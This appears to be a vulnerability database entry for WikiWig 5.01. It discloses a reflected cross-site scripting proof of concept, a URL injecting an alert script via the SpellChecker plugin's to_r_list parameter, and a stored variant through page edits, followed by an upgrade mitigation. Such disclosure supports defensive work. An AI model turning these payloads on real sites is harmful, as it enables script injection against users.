vendor:
WikiWig
by:
AutoSec Tools
N/A
CVSS
N/A
Persistent/Reflected Cross-site Scripting
79
CWE
Product Name: WikiWig
Affected Version From: 05.01
Affected Version To: 05.01
Patch Exists: YES
Related CWE: N/A
CPE: a:wikiwig:wikiwig:5.01
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista + XAMPP
2011
WikiWig 5.01 Persistent/Reflected Cross-site Scripting
A persistent/reflected cross-site scripting vulnerability in WikiWig 5.01 can be exploited to execute arbitrary JavaScript. Reflected: http://localhost/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E Persistent: Create a user account. Edit any page and add script tags. <script>alert(0)</script>
Mitigation:
Upgrade to the latest version of WikiWig.
